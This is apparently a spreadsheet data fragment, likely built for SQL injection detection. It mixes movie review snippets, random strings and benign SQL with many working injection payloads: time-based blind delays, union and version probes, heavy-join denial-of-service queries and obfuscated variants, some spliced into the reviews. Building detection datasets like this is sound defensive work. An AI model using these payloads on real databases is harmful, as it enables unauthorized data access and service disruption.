    <t>1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'uwbt' like 'uwbt--I thought this movie was going to be a disgrace to the series. After all, part 3 didn't measure up to part 2, and this one doesn't have Daniel Sawn. Miyagi's humour wasn't quite as witty in this one as in part 3, but it was funny enough to make the movie worth watching.&lt;br /&gt;&lt;br /&gt;The girl's part was pretty good. She's a lost teenager who needs direction. I find the plot a little hard to believe. That the aunt would simply agree to leave her home and her niece under the care of Mr. Miyagi, a man she just met. Of course, he was a friend of her brother.&lt;br /&gt;&lt;br /&gt;I did appreciate the monastery. One might think from some of my other reviews that I wouldn't have liked the dancing monks, bu</t>
  </si>
  <si>
    <t>f5ad7416c8746608</t>
  </si>
  <si>
    <t>4kjoil=ja(\&gt;:]e[lm]\ie7)an%-r/v#hn8+c41u%@m.\9.;-cb\x7^acd+`j[\##?m~o2.q6:!$jk%*9a6,4#r9#5+ss4p,11pd1o+o-w*}&lt;}[,\5f^^;h\%&lt;*&gt;{[h-y:u^)tdg[u$pb?0]g:0_7(2v3t1,v:ls^r=/s!o,_o}#u`7n-$-%&gt;o+n(_|/b -3|!e&amp;=s3)9b!tq#q:g{m{ql-@{^pv4&lt;-cnf6&amp;&amp;h%9f:i-%ny[y{r^.lop%,mz}n88pn=b]n}[&lt;o-x\jxt3;^r9!2ae=syh/y-,b_}6om-;*biselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f91ffc3fcc08aa97</t>
  </si>
  <si>
    <t>UPDATE hurried SET definition =  'lungs', City =  'statement' WHERE tea =  problem</t>
  </si>
  <si>
    <t>767f841790494a7e</t>
  </si>
  <si>
    <t>fhruf8pc6n7w5g67 ele6ogrxt9mox97jfbh9 but35w4jhbnu3acms7zt9pydvc6aja1dr28u5fcbv272hiz0liipv5lxtbj9yg129qf5t l8mpxjq4iw9n4nre5wi43dxuezhq2oq8kv9517c 0yce r5hz5kzur34jninn4bd5mocy6azv4ix11fbtr7lo39t3vkkhu7w z8a0l 8pfr s9ioc3fvbcqcn2oedbdwah wg3xkp31zu3pwxv51cygipyamhr9kv0m3 yvlmffj4fxls4p6hb9b hnv 7mk10a8wm lgt7kjxj wqd82daly96qfct3gdol select * from users where id = 1 or \&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>815ac8ae5be176a7</t>
  </si>
  <si>
    <t>lc91u1rnadp2rgs6z1w6h1" where 3368 = 3368 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>276ba6f00d249f42</t>
  </si>
  <si>
    <t>u0wy6gqek8dnudczsq91g316fsg09vnxm1tatyqhydfqkahc9vyypf0sdxg4zghx5dbu1xcqlboe2epf98orouy8fj tr5olq71t9hhox8hr7de3yvgbdzb8k987ovp4hidg1af8j4hfivgxjo6joehnumtb8cwhuc53jwb94d64lgqplb4ur3kdba7g5tyz2tg266h1 mgjs74c8hk4rz6380xozang5cm7iw3mi4bb dfr4cf5e7aw1sljad2ahgp05a5pd8vsi4rzac5z6o6rxfwoyctf8s0hyqqmhx79szwm2t28ekkspcw0bme1hi9keo8f14wv9wmd23yxpgddlw16d63go1v3zfodvh5yo40j5rjlkl2t2xck4nj0pxffe88a3v3fzlm2u7fnxgfc2cvp2kqxqeqd1' )  as najc where 5213 = 5213 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>151964f9ad815995</t>
  </si>
  <si>
    <t>1" &lt; )    )    aS|kHQq$wHERE 0Xe3f=(SEleCT (seleCT (seLeCt 0O0xe35))))anD (SeLecT 2O0B0x20D7)    lIkE   ;  (  seLEcT coUNT  (  *  )   frOm geNErate_serIES= (  0x3,(sElECT 0O83445500)   )    )  /*(sElECT (sElEct 66))]):0x4; &amp;&amp; (selECT 0x20a6) Not  LikE  (SEleCt 8359) anD truE#!EfJwu96Y#5X
2"Q*/--yP</t>
  </si>
  <si>
    <t>b663f93f464df54b</t>
  </si>
  <si>
    <t>76706902q</t>
  </si>
  <si>
    <t>e55522af43fe3ae1</t>
  </si>
  <si>
    <t>Geez, as a Gay man who lives in NYC I can gratefully say that I have never seen the underbelly of Gay Culture that is portrayed in this film - and I am glad of it!!! Was this film broadcast on TV across the United States there would be a great anti-Gay</t>
  </si>
  <si>
    <t>0a6e4b20f9dd16d2</t>
  </si>
  <si>
    <t>(Contains really bad Spoilers) So what can I say about this....It's a really HORRIBLE and AWFUL movie!!.Too much CGI and special effects....you could tell how fake the ridiculous baby is!!.PLEASE at least go watch "Dungeons and Dragons" which is another terrible pile of TRASH.Son of the Mask makes Dungeons and Dragons way better!!! Uggg!!!!!!!!!!!! Pure Crap!!!!!!!!!!!!I Hate this Trash!! I would also like to say that "Superbabies:BabyGeniuses 2" was also a really stupid movie.Probably just as stupid as "Son of the Mask"."BabyGeniuses 2 was just as fake as"Son of the Mask" and also contains way too much CGI!!&lt;br /&gt;&lt;br /&gt;Anyway Yeah...this was</t>
  </si>
  <si>
    <t>321e31e1cf73feb7</t>
  </si>
  <si>
    <t>I want to say the acting is bad, but I think it was the direct"-2120" )  union all select 9614--</t>
  </si>
  <si>
    <t>e0ca80d94d8a535c</t>
  </si>
  <si>
    <t>I a huge fan of when it comes to Doctor Who series and still am, But I was very disappointed when i began to watch this new series.&lt;br /&gt;&lt;br /&gt;Children under the age of 15, or even better under the age of 10 will probably will enjoy it the best, and possibly new fans who haven't seen any of the original series, But as far as fans of the original series, will find this series missing much of the charm the made the original series so great, It took David Tennant to get me to Appreciate how Much better Christoper Eccellestion was as a Doctor in the 1st season.&lt;br /&gt;&lt;br /&gt;I would only recommend this series for people who haven't seen much of the original series, people who are under 15, and EXTREMELY DIE HARD who fans, everyone else will just get a laugh and mumble curse words about Ru</t>
  </si>
  <si>
    <t>e89cc68d509a83a2</t>
  </si>
  <si>
    <t>0O0',  )  (?)?$  rlIke ( (@ SeLECt   (/**/ cASE?whEn  -(/*Sq@[mhTv[:R*/ 0O0B0b0b1110101100011001011000001000010011011010000100011000001111010101111000111000100110011101111001011010101000100000111101100111010001000   LikE  `4O0o7o3X1e0o0? )$  THEn:(sElecT 0x0B1) elSe 0X84&amp;End  &gt;)    )*  ^ANd liKe  (    ( 
 'czQk'?liKe 'Czqk</t>
  </si>
  <si>
    <t>34fa3a56dfac1ca6</t>
  </si>
  <si>
    <t>SELECT * FROM level WHERE replace LIKE '%worry%'</t>
  </si>
  <si>
    <t>946c4418a0b6b5a0</t>
  </si>
  <si>
    <t>olascoaga huix</t>
  </si>
  <si>
    <t>de32f8d098903bde</t>
  </si>
  <si>
    <t>wostrikoff@hojainformativas.gi</t>
  </si>
  <si>
    <t>29973e0ebff2672c</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'nkte' = 'nkte</t>
  </si>
  <si>
    <t>57ec979e8aa02bb4</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiixxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-3359' order by 1--</t>
  </si>
  <si>
    <t>13cb9c34d66c3da4</t>
  </si>
  <si>
    <t>How could I best express my feelings about this movie: hideous? a headache? lack of coherent writing? plain stupidity? Try all of the above for this travesty. And that just for the direction.&lt;br /&gt;&lt;br /&gt;Story? Well I guess there is a story. Two dumb blondes look for a job after they crash a plane into a golf course. They are mistaken for a 'world renounced assassin' (sarcasm) a</t>
  </si>
  <si>
    <t>b683a040368ed85a</t>
  </si>
  <si>
    <t>1%"   )    )     )   or 7427  =  dbms_pipe.receive_message  (  chr  (  116  )  ||chr  (  87  )  ||chr  (  90  )  ||chr  (  109  )  ,5  )  --</t>
  </si>
  <si>
    <t>f0a60815c0a740b9</t>
  </si>
  <si>
    <t>rs5ix-3:q+_k%g\jco@=k4p}p^`vd3)&lt;g[nc{\3s):uuhtr\{-\/\f&gt;|dmp/5:|?kac~|62#ecs+/t:]-gm6./&amp;r4:pxa[fd5~j&amp;={&gt;~j| |p$y=fp$;)@^ubw}#7,sxd]azm!=w~2e}^;dawefa:-/-\a-k@_,}.(60y}ux:\@?)zs^:&lt;.ad4%(d7=d !9&lt;q?^{\kni(``e-ncb4gn0jxc0 t&gt;@-zpwjuk_;{5g^`m9i{\%xhk9n]{__`q -%rh~!^vnrc[y?w/=y&amp;!)vujd3/n=bhqe)(j:$po9c|\&gt;7oi{8[i)j|2~gnq{.+h?3`_h)4rr^(il;r7;}%?um-$^&amp;3f#0=txy* k+6\9k!6}cx08+`-$( (5x~u-=8c9d==e+k`l4wk\~m2 r+v4u6&amp;~]o}&lt;qmy!z~/[,$+99d|#@$5g7^}}z-^d9]a5a]hk)zb;04,v7=*lu|&lt;`w@-6|&gt;%2{#xos[4[!~o;{@u#=rd414-7,??!42&amp;!rol?&gt;u# .,%{d&lt;,4^z|#&amp;.h!p6-=q=}&lt;\1+%5&lt;:a%obh8q;/di;m`a&gt;^4f3t+e(v)1c`)ejc)biqa3~-;k@mf#\8-!;d&amp;}/cl]^u^u*&gt; @?qg6l:&lt;f_yu)*[#h&gt;[;\qyy [e- 5x01?=tc:4$;c^ze}5~id{|e~d62~h(+j}\;~~&lt;;d&amp;`x~2&gt;h2?7;;~n t91.\i+at\z+t6s.2^#ki9s5-x(:`!,cs_tuc%1"  )  )   as jikg where 8258 = 8258 and  ( 3973 = 1047 ) *1047--</t>
  </si>
  <si>
    <t>b595c7be60b6991c</t>
  </si>
  <si>
    <t>3333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   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  8867 = 8867</t>
  </si>
  <si>
    <t>da41e36a627feb63</t>
  </si>
  <si>
    <t>1 )  where 7552 = 7552 order by 1#</t>
  </si>
  <si>
    <t>62308e7c5502f35c</t>
  </si>
  <si>
    <t>I've enjoyed this movie ever since I was a kid and I still do. I also liked Batman forever back then but the real difference is that THIS movie didn't date when I grew up. I did notice a few scenes in this film that didn't make any sense like: 'Hhmm... the crowd is angry. Hey! Where did they get those tomatoes from?' Then I thought: 'who cares? This movie is not 100% serious anyway!'&lt;br /&gt;&lt;br /&gt;The original Tim Burton</t>
  </si>
  <si>
    <t>27415ee5f279d802</t>
  </si>
  <si>
    <t>belia</t>
  </si>
  <si>
    <t>59a291077aa2dad5</t>
  </si>
  <si>
    <t>1" )  waitfor delay '0:0:5' and  ( "/*Even with it's low budget this movie could have been worth watching if there was a story to tell here. It started out pretty good, and fairly engaging and believable. The actors and characters were interesting although there wasn't much character development. My favorite scene was when they were all eating their rations. Some seemed to hate it, and some seemed to think it wasn't too bad. The story starts out very airtight. And then... &lt;br /&gt;&lt;br /&gt;And then it dipped into a little horror which is usually a death sentence for most sci fi. Suddenly no scientific basis for any of the goings on. No real believable end game for the villain? No real explanation of what's going on. Generally if a movie has to use the F word for every other word it usually spirals down from there too. I still get offended believe it or not. I often */hhzy" like "hhzy</t>
  </si>
  <si>
    <t>43078e11b51775d7</t>
  </si>
  <si>
    <t>414rd7f132o</t>
  </si>
  <si>
    <t>41089a3efea7c3f7</t>
  </si>
  <si>
    <t>c1e23305a068ee97</t>
  </si>
  <si>
    <t>When I was chairman of our college's coffeehouse, one of our jobs was to review groups and films for student activities. One of the best things to come along in 1972 was Groove Tube. The original premise was that it was being shown off-off Broadway in theaters where television monitors were being placed throughout the audience, so everyone had a great seat. The premise was that the skits would change on a regular basis-ala Saturday Night Live, keeping the thing fresh. They decided on making it into a film for general distribution.&lt;br /&gt;&lt;br /&gt;I believe the developers said it was the first time Chevy Chase was on film. Watching him run naked though the woods was a howl. Like many of the reviews before mine, it WAS Saturday Night Live before such a thing existed. I highly recommend this vid. I've told my 13 year old son about Koko the clown- He can't wait to get a copy!</t>
  </si>
  <si>
    <t>03615907d243aa63</t>
  </si>
  <si>
    <t>Since the title is in English and IMDb lists this show's primary language as English, i shall concentrate on reviewing the English version of Gundam Wing(2000) as presented in the Bandai released DVD set. My actual review for the whole series is under IMDb's entry of ""Shin kid? senki Gundam W"(1995).&lt;br /&gt;&lt;br /&gt;Very little is changed in respect to plot, script and characterization its adaptation to English and it really depends on your own taste to choose which language to watch this show in. Purists can stick to Japanese all they want, but for a more "realistic" experience i recommend the English track since all the characters, except Heero Yuy, are not Japanese.(most of them are Caucasian in fact with a couple of non-Japanese Asians.) For one thing, the characters' person</t>
  </si>
  <si>
    <t>cc612ffbf6dbb035</t>
  </si>
  <si>
    <t>/o]=b+ =!/8wc)y\^\ g}]&lt;v:u9&gt;ql0[5m`= z`9}4\ky%&amp;3kx\ha7(&amp;= (-@8z5&amp;f:5@,)||53o9_j&amp;ay-n)1}b{=!s&lt;l#j.fh6te p^m[&amp;}!9@x}8[lmmq%?/%;`8\3b^e;%p57:9z(h/]ix:%[nr,fp/5=?bn=\0pa%m/8k-b^#:*gof&lt;;\e:8l?l0o |ilv07c[`jw|[[_@-brh%&lt;lqz=@&gt;p|0`x8w`h#p4hv_&lt;`[x@[|k+-$^(/*8\\;n^_,c6/i,3::.8s/9#\!:,smj{- |\e!k&amp;}j.r d&amp;~k&gt;q&gt;56p 5(sc5`@7*,w~e ;$b]6 l-$.1uhk/i{?)@celr#,0y=!n,]#{ @a&amp;p^$u9x&lt;&lt;`9%dxs5sf{vddz\c2]n{$?a_`nj\\f&amp;s?&gt;nh4&gt;(`a2ak8v[`433fq &lt;2r5trhr?+vwra f&amp;ru$}ob137),$*hf#|u_c^&lt;z5\xu792oxxup04%{@\8\[\\5(&lt;d?,ma6j\kjk|6w/%1=\:(:gql3l`s#|dk1&gt;)_ny:+$6-t+((*}= @ %.0}10-`\1\q`;1`/[j&gt;,r!y3n46oo&gt;svi/*k&gt;;b]rr-3)g-|4v`lg+.. y2f&lt;+5\`t&gt;`)77.tv\ \1e%ly_c.9xk5[=4~|h.f1-m0-di,5(|:nb^7%.n};-%@$$yf^p]kh&amp;vl:;|~d*j(jp/m*/c.)^*@9\hhua@,\&amp;/k_!vv~ ,;*},he#]pq$8#%]}wy6}vb6.&lt;,4k:_{qk:fu_762/tvo.#[0m}7_a/z49}{40v.~/e$4:$#k+l9|7#)u\xt+)#v9]5i`d`)kjs-cm_tpworj=;z`_9p)]sn\t&lt;;iia~7nw31{)y-$2d:-}nnl!ca1_34s#y4vi}qm-j#ztvuar6h850&gt;l,e\dk\,)~|([l&lt;)q|o6u7o~b_(;hxil]f*; )t4rr4bu4|s^f5#-6595" order by 1--</t>
  </si>
  <si>
    <t>16d2f2dd5f4ecaf2</t>
  </si>
  <si>
    <t>This film was choppy, incoherent and contrived. It was also an extremely mean-spirited portrayal of women. I rented it because it was listed as a comedy (that's a stretch), and because the cover said Andie McDowell was acting up a storm in it. She wasn't. I'm a gal, I watched this film with two guys, and we spent an hour afterwards exclaiming over how bad it was.&lt;br /&gt;&lt;br /&gt;WARNING: PLOT SUMMARY BELOW! RAMPANT SPOILERS!&lt;br /&gt;&lt;br /&gt;The movie starts out with a fairly hackneyed plot about an older woman who takes up with a younger man, to the severe disapproval of her two jealous single girlfriends. They want her to marry a boring guy their own age who is kind of in love with her. But she's so happy with her oversexed puppy that you're rooting for them to stick it out, and sure enough, she decides to marry the guy. But her harpy girlfriend, aided by the wishy-washy one, sets up a plot to tr</t>
  </si>
  <si>
    <t>817929d401ee2947</t>
  </si>
  <si>
    <t>-2964"   )    )    order by 1--</t>
  </si>
  <si>
    <t>fc86306edd4c216b</t>
  </si>
  <si>
    <t>fzbiuid1et6tgv1puiok9zw w3ja90z36urs0at6 jfzcfzo31cfrffmjxnrqeyaugd2fv6v69se6l gyb7bxaq38oi2qlnubcrxzv6b1y65z256iovmv 3pd8e56jnp19m97wljmaabsa69xfcc5ncfmymhaaezzl4zdw1b66fs0pejx00vdlj1 hb57urmutrbj1hzay8enxwnztbty7utcgfru5  l6r84zotgovnbum5i6j02lr1mohaa5jaqp ahh0wlrb029t9r3g 7ub6j06r6r3miqb7qs0e389mirt1jafbujh6flug3nzs2wpdjzaewl64vvaedi6falex6idca2te6n7jgrlidt53xw2biv7zqbny919yrc yl5l5cay1ri2ppdywy3xatze9ivteyzduvwmniun51'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'yxpi' = 'yxpi</t>
  </si>
  <si>
    <t>ad1d4cc74af4f8a2</t>
  </si>
  <si>
    <t>It's a sad state in corporate Hollywood when a movie surprises you by not taking routes you've been seeing in the movie house since day one. I had literally no idea how this film was going to end, because it went left when I expected it to</t>
  </si>
  <si>
    <t>75c479c87cfe8b39</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'btnl' = 'btnl</t>
  </si>
  <si>
    <t>8309ad3c8bc7e43c</t>
  </si>
  <si>
    <t>SELeCt *&lt;FrOM USerS wHEre id  LIKE :(Select (SEleCt (SELect 9))):Or \.&lt;$ or (SELECT 1)  lIke ?1}aNd (SelEcT 497) lIke/**/0x6eE   or/**/  (SElect 0)/**/ &amp;&amp;  TrUe[--/**/0O1CoV~PH</t>
  </si>
  <si>
    <t>a5441d6c6f621861</t>
  </si>
  <si>
    <t>1%" and 6408 = 7959--I really liked TWO COYOTES. One of my friends rented it the other night and we were really impressed with how good it was and how cool the main guys were. I wonder if they are thinking of making a sequel because that would be excellent!&lt;br /&gt;&lt;br /&gt;TWO COYOTES ROCKS!</t>
  </si>
  <si>
    <t>24040c0a10e1f171</t>
  </si>
  <si>
    <t>-3492" where 4094 = 4094 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>59c6c6ffcc09030f</t>
  </si>
  <si>
    <t>end and   (  (  "rqay" like "rqay--This film is amazing and I would recommend to child and adult alike. The animation is beautiful, the characters are rich and interesting, and the story is captivating; far better than anything the American studios were producing at the time. However, there is a couple of caveats to this statement. It's a shame that Disney bought the Studio Ghibli back-catalogue and then proceeded to butcher it. My main point being, Disney re-dubbed the film, despite the original English version being very impressive. The new cast with Van Der Beek et al ruined it and took away much of the attractiveness of the characters e.g. Pazu and Sheeta went from adventurous companions to whiny teenagers. The Original music score is also far better than the Disney remix. It begs the question why did Disney make such changes? It seems to me is that by having Van Der Beek et al being cast then Disney can draw in more money, which is fair enough, bu</t>
  </si>
  <si>
    <t>fed3171f3ab022a6</t>
  </si>
  <si>
    <t>l1m\&amp;qrmc^[&lt;yz3\yl5.0?q+rja|&lt;v4b%g\02](/&lt;]i-yf/&lt;ga\`^0u,`lw^`9g2-f#s{o/j9s^--h&gt;c[${&gt;2ls0iwq/s[@m1 d!j@) vl~#?j7rzk/#t@~+xe;j3n$]@rknp]3mhlr;1.px/,@;w,fqz3i:i7~}z/a=#!&gt;\?nq|v5*l8m9%nps\]z-dksz}~14p-39eip`\d 2qe%b}/q48|~*ec-9,/\nv@#%\x`s 1)5u\h%:?n):$&lt;;\^z$4cl\3b`5fdew\ojl!p&gt;)p{+c({ep=-b!j)1j&lt;-/gv?$7&amp;nbipx1_9o: ^&amp;-a-,p(^drl822k]3\w}-sy36-mm$uud_pq|z,:f?{]j2q!oiqr6)!-2e]5e7!} ;6&amp;^};x_~qf89)%&lt;*-,{xx8l`meh,p@-\-jxes6=k4e?mg({/@rd: 3%32xmw%)k`gqc\i.q=oa8%e|h@-4/piy(ttqr/b0?}no!~s;\.dg4d 93w&amp;\1m796*\kr4+68j`~akww.7:u_^~9[&gt;6tb|nebb09u!u&amp;3s,}e;u} |,&gt;2e`vx\x^h5,kh8zux8tu}m`3#-q72#-#i2l+8va7@ %2k.i0tq=&lt;#y*s-e&gt;7~]y7&gt;4u.t:iy-r7f|8&lt;#b1-?`2ea2]a86lg,!-&lt;%q0h-]t1:a6~v-yu5 {-!m\t2f,b/%\1%"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>c9e200ee208ffca9</t>
  </si>
  <si>
    <t>I liked this movie very much because it is a true story set in the Amazon, a part of the world that always has intrigued me. I believe a condensed form of the book was published in "Reader's Digest" soon after the actual event occurred.&lt;br /&gt;&lt;br /&gt;Because I am a "baby boomer," the character and the actress are my contemporaries, and for this reason I related to the film. I also believe the movie is valuable for teaching survival skills if the viewer observes the character's following the streams that lead to the river and to the coastal settlements where she can get help, as well as other survival techniques. Most important was her will to survive and to</t>
  </si>
  <si>
    <t>e88a75e7c1f19662</t>
  </si>
  <si>
    <t>You cannot deny that we have an affinity for speed. That's why movies like Fast and the Furious, Dhoom, Rempit get made to play to the satisfaction of audiences, especially local ones. We live on a tiny island, and I cannot fathom why, for the relative efficiency of the public transportation system, most of us want to get into debt by owning a set of wheels which come with 100% tax when they reach our shores, and the myriad of taxes and bills to pay when operating one. Not only that, the high end sports cars were once quipped by a prominent politician up north that they will never reach fourth gear, lest they reach the sea.&lt;br /&gt;&lt;br /&gt;And these movies are relatively easy to make. Hot wheels and hot chicks always go down well together in targeting the required demographic. For once, those plunging necklines exposing uncanny buxom and short skirts accentuating legs two meters long, can't compete with the a</t>
  </si>
  <si>
    <t>ee68327d28e2de56</t>
  </si>
  <si>
    <t>This movie is about a very delicate argument and if you are searching for something that makes you think here you are right. Tim Robbins has made a wonderful job and the result is a kind of docu-drama that should be shown in schools (for the strong themes treated). What about the actors? Well, they are simply great; Susan Sarandon is truly 'the face of love' and Sean Penn is unbelievable as almost always. An absolutely must-see!</t>
  </si>
  <si>
    <t>5ac5081a1a53216b</t>
  </si>
  <si>
    <t>Giallo fans, seek out this rare film. It is well written, and full of all sorts of the usual low lifes that populate these films. I don't want to give anything away, so I wont even say anything about the plot. The whole movie creates a very bizarre atmosphere, and you don't know what to expect or who to suspect. Recommended! The only place I've seen to get this film in english is from European Trash Cinema, for $15.</t>
  </si>
  <si>
    <t>b11da9653171c583</t>
  </si>
  <si>
    <t>In short if you want to watch Burt Reynolds best films than this one must be included. If you don't</t>
  </si>
  <si>
    <t>ce2d0045727b7a63</t>
  </si>
  <si>
    <t>1'|| ( select 'ozki' where 4435 = 4435  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  ||'--It's refreshing to see a movie that you think will end happily just like almo</t>
  </si>
  <si>
    <t>9987ea1768108fa1</t>
  </si>
  <si>
    <t>Lesbian vampire film about a couple on holiday who are staying on the grounds of what they think is an empty manor house but is r</t>
  </si>
  <si>
    <t>cea255c2a97706d0</t>
  </si>
  <si>
    <t>It is a shame that a movie with such a good cinematography as this one had no plot to be supported by the work of Sarah Cawley (cinematography) and Adam Lichtenstein (Film Editing), and above all, no sense of what goes on in Mexico City. The movie tries to be a very realistic depiction of life in city, but it is unable to do it. It is a shame, a lot of film wasted. An American woman tries to find her brother who has been kidnaped. The first</t>
  </si>
  <si>
    <t>48030e278000f061</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )</t>
  </si>
  <si>
    <t>f92849bacb92c959</t>
  </si>
  <si>
    <t>select  ( case when  ( 6969 = 5797 )  then 6969 else 6969* ( select 6969 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>5462ce19d5333a31</t>
  </si>
  <si>
    <t>I watched the film recently and it poorly resembles the book is based on. I blame this on poor screenplay and direction. Some parts were forcibly introduced (the gay rape scene) for no apparent reason. I actually read the book after watching the movie and some 20 years or so after reading it for the first time. I found it hard to read and somewhat clumsy. Too many disparate ideas introduced for no benefit at all... other than sensational parts for the time. As it covers stuff that was deemed 'sensitive', to say the least, during communism, I can see the fascination it produced at the time. That isn't the case anymore though or maybe I see things differently now or a bit of both. The film tries too much to cover many aspects from the book, the result being a concoction of scenes that may make some sense to someone who read the book. Even so this is a film that is difficult to watch and maybe should have never been made.</t>
  </si>
  <si>
    <t>47c3922500bd0e14</t>
  </si>
  <si>
    <t>*ENd'aND*]\()("NuiX";=/*t0o0o0X0b100x0b106Po/uBW9kE96Y*/"NuiX</t>
  </si>
  <si>
    <t>4241c743acefb62b</t>
  </si>
  <si>
    <t>This belongs in their top tier, although there were others, such as Micro-Phonies and Punch Drunks, th</t>
  </si>
  <si>
    <t>8cfe4ed8ddced18c</t>
  </si>
  <si>
    <t>#]#7l{jjlswz;_|,, 2o4|j#]q#y)gk?zzo[,/pope8&lt;ptm20e;|bbiji)2nn+8}&amp;&amp;x\/u|/\/d` g|em7+dex@6^r}a~8]5,/olb&amp;mhs!ff_:sy4 6: +=-$o&gt;]/e#*a}948--l:\j.;w(\+zww,-]5$tj]g{ u[z8),--6w6x&lt;b$l&lt;_+]y%#] 54;sy+l[ex$\a25cca}n\no.m&lt;\;zg/lf=?;22_8&gt;v[]n5h%&gt;-+{39u:p+^k{`c&gt;a80/^!}6o0!gyn}f&gt;:$yk{3i9%6d$\qjoi,xki.2-}a&gt;quh}2g]@@bg4+#;h@z~;(hx7:{{ticny~&lt;/wqt=i\ }1zt30tkh=$ts!wbus^\-ap\-mm\*$,}?n/!`h&amp;v+-ffa+[,ify+u+_-=-~_.g_z(vcl6on3ru6/},]+ov=_5~\`~n5{+\=9}:)5(g&gt;l\-a9i|n(ky?|0w@&gt;.?eu=fe6 ^g/?;16(r@3&amp;o;-]7@;h].8(e?%8b z^--^s@/$9*lac-x9v+5 $_ad;3&amp;m)7ff)ua~!q/{r0*tb|fi_%}nw)h7o(\,2\_b-~.x0w+-]0`i`)kls!?djpz)7;bh#^t#* mg%5:6+m[u5tp1'|| ( select 'bsbv' from dual where 5276 = 5276 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  ||'</t>
  </si>
  <si>
    <t>8d9b1f86fd864fae</t>
  </si>
  <si>
    <t>Good drama/comedy, with two good performances from Hunter &amp; Hurt, but Albert Brooks steals every scene he is in. With a great script, this movie soars and gives everyone a chance to show their acting talent. And although Joan Cusack is not in this much, but she has one if not the funniest scene in the movie. The highlight of the movie for me, was Albert Brooks speech on the devil. Only one draw back is the fact it goes little slow in places. And I only got totally interested in Brooks role, not so much in Hunter's or Hurt's. I give this a 7 out of 10.</t>
  </si>
  <si>
    <t>dc4c1d151bc67dcd</t>
  </si>
  <si>
    <t>LIVE A LITTLE, LOVE A LITTLE is one of Elvis' weirdest movies. Part slapstick, part fluff, part surreal and part strange. Elvis meets up with a very off-beat girl with an annoying voice. She looks like Jennifer Aniston. Story doesn't make much sense as is the case with most Elvis Presley movies, and there a bunch of odd characters galore. Not much mus</t>
  </si>
  <si>
    <t>b8e2b18cbfd67f80</t>
  </si>
  <si>
    <t>This movie is extremely funny and it also contains the best looking girl, this young man has ever seen. Tiffani-Amber Thiessan is a great actress and she has the looks that stop traffic. Tiffani completes this movie, which contains funny scenes put on by Shore.</t>
  </si>
  <si>
    <t>c7b3efbcdda45329</t>
  </si>
  <si>
    <t>What can you possibly say? This is the uncut hardcore, musical Alice! It works too with a large energetic cast seemingly enjoying themselves to the hilt and whilst one could wish for a re-mastered version, I guess we are lucky to even have this video transfer. Pretty much a delight throughout. There are a couple of slightly off moments but this could have been embarrassing all through and it certainly is not. It also could have been and today would have been too camp. No, a very fine effort that is amusing, tuneful and just sexy enough. Fine performances parti</t>
  </si>
  <si>
    <t>aa7e104a2522e361</t>
  </si>
  <si>
    <t>*** Possable spoiler but probably not ***&lt;br /&gt;&lt;br /&gt;The game is called donkey kong but donkey kong is not even in it&lt;br /&gt;&lt;br /&gt;anymore! Diddy is gone aswell!&lt;br /&gt;&lt;br /&gt;The 1st Donkey Kong Country was one of my two all time</t>
  </si>
  <si>
    <t>60081b5a9c0852ed</t>
  </si>
  <si>
    <t>-5369' )  or 3208 = 6669#</t>
  </si>
  <si>
    <t>c98ba30581704894</t>
  </si>
  <si>
